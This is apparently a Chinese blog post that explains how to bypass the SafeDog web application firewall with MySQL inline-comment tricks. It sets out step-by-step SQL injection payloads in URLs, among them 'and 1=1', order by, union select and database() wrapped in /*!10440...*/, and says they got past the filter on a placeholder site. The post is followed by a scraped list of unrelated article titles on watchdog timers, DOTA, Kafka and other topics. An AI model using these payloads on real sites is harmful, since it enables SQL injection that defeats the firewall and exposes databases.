MYSQL绕过安全狗:

内联注释法:/*! */

首先测试拦截关键字:and 1=1 被拦
http://xxxx.com:8888/int.php?id=5 and 1=1

内联注释测试:/*!10440and*/1=1

可以看到已经绕过了安全狗检测,/*!数字and*/1=1,内联注释中的数字是通过模糊测试出来的。
注意:/*!数字*/ 数字小于数据库版本关键字会执行,大于数据库的版本关键字不会执行,看作注释字符串。

继续测试其他关键字:
Order by 测试
http://xxxx.com:8888/int.php?id=5 order by 5
居然没拦截,好,继续测试其他关键字。
通过测试知道order by 5。继续来看回显位。
Union select 测试:

http://xxxx.com:8888/int.php?id=-5 union select 1,2,3,4,5

被拦,好,用之前测试好的内联注释试试。

http://xxxx.com:8888/int.php?id=-5/*!10440union*//*!10440select*/1,2,3,4,5


还是可以绕过去的,继续来显示数据名称试试。

http://xxx.com:8888/int.php?id=-5/*!10440union*//*!10440select*//*!10440database()*/,2,3,4,5


经测试database不拦,加上()括号就被拦,可以在database和()之间加一段注释试一下。

http://xxx.com:8888/int.php?id=-5/*!10440union*//*!10440select*//*!10440database/**/()*/,2,3,4,5

总结:经过以上测试将关键字包含到/*!10440*/里面即可绕过安全狗。

ByPASS系列之安全狗相关推荐

  1. STC89系列单片机看门狗的使用及应用程序

    转载:STC89系列单片机看门狗的使用及应用程序 "看门狗"概念及其应用在由单片机构成的系统中,由于单片机的工作有可能会受到来自外界电磁场的干扰,造成程序的跑飞,从而陷入死循环,程 ...

  2. 关于ARM Cortex a 系列的看门狗定时器

    关于ARM cortex a系列的看门狗定时器,现在以三星公司的S5PV210为例子,来讨论学习一下看门狗定时器的相关知识. 刚开始学习使用英文技术手册,很多都不太习惯,不过还是坚持吧. 看门狗定时器 ...

  3. GD32F4xx系列的看门狗配置

    GD32F4xx系列的独立看门狗配置: 查看GD32F4的独立看门狗有一个32K的独立时钟源,适用于粗略计时 不同的预分频系数下最大和最小的超时时间: 看门狗超时时间计算公式: T=Count / ( ...

  4. 【网络安全】SQL注入bypass最新版安全狗

    前言 安全狗又偷偷摸摸更新了 [网络安全学习] 绕过 之前安全狗就像没开发完一样,简单内联就过去了,但是现在的安全狗摇身一变,变得稳重了起来. 就连报错界面都变成了大人的模样. 看这架势,不好过啊 首 ...

  5. Amlogic A311D 驱动分析系列(一)-看门狗驱动分析

    本系列文章基于Amlogic A311D SDK中的驱动,将我之前阅读代码的一些收获进行总结,算是学习笔记吧. 1.dts配置 先看dts调用的是看门狗的哪个驱动 wdt: watchdog@0xff ...

  6. DOTA系列 食尸鬼(小狗)攻略

    本攻略有3部分: 1:英雄介绍 2:装备/加点路线 3:英雄分析及如何Farm最快 英雄介绍:英雄介绍: 曾经在Lordaeron有一个贪婪到已经不值得任何怜悯的人.终于,在试图偷取Arthas王子的 ...

  7. C8051关闭看门狗汇编语言,STC系列单片机 看门狗一旦启动,就无法关闭

    [C] syntaxhighlighter_viewsource syntaxhighlighter_copycode#include #include"STC12C5AXX.h" ...

  8. bypass最新版d盾mysql_Bypass 护卫神SQL注入防御(多姿势)

    0x00 前言 ​ 护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能. 这边主要分享一下几种思路,Bypa ...

  9. 德国Vector维克多全系列授权or达芬奇软件

    vector keyman canoe diva canap e autosar 达芬奇 candela odx 1939 flexray lin XCP以太网 license vteststudio ...

最新文章

  1. Docker Hub 镜像加速器
  2. “骗子”成民企院士第一人:把认真当信仰,人生就会开挂
  3. c语言switch自动贩卖机,JAVA程式-自动贩卖机SWITCHampCASE.doc
  4. 服务器系统事件报错4103,IIS信息服务器排错指导
  5. 计算机安全最基础知识,计算机的分类(信息安全基础知识)
  6. python语言-Python语言的特点有哪些?
  7. Daily Scrum 10.28
  8. 铁路售票系统的设计分析(时序图、类图)
  9. 21天学通C语言-学习笔记(5)
  10. C语言自学-简单的记录
  11. 23王道——层次遍历、非递归中序遍历
  12. LUP分解法求解线性方程组
  13. 吃土豆 递归分制算法(浪费时间)
  14. c语言 一帮一题目,【精品资料】大学优秀学子风采录.doc
  15. Linux(Centos7) 报 “RTNETLINK answers: File exists” 问题的解决
  16. phpword 实现word文件模板字符替换
  17. Android 更换皮肤
  18. 三角形质心坐标怎么求_三角形的重心怎么求
  19. 古典概型,条件概率,贝叶斯公式
  20. IEEE2019论文:使用基于特征融合和缩放的具有空间上下文分析的单镜头检测器在无人机图像中检测小物体

热门文章

  1. python量化分析 03-订单状态说明
  2. 报表打印,从需求出发,简单就好
  3. Python3 pd.merge()使用实例
  4. 新概念每天学多少合适? 新概念学习方法汇总?上班族该如何分配时间学新概念?
  5. 【转载】任正非致员工信公布:全面提升软件工程能力和实践
  6. Kaggle竞赛中使用YOLOv5将目标检测的性能翻倍的心路历程
  7. 拉项目--球球世道的总结-解决了viewpager+fragment+tablayout 两个bug
  8. Web信息抽取——SWDE数据集简介(翻译)
  9. (附源码)计算机毕业设计SSM智慧医疗系统
  10. Kafka入门教程 Golang实现Kafka消息发送、接收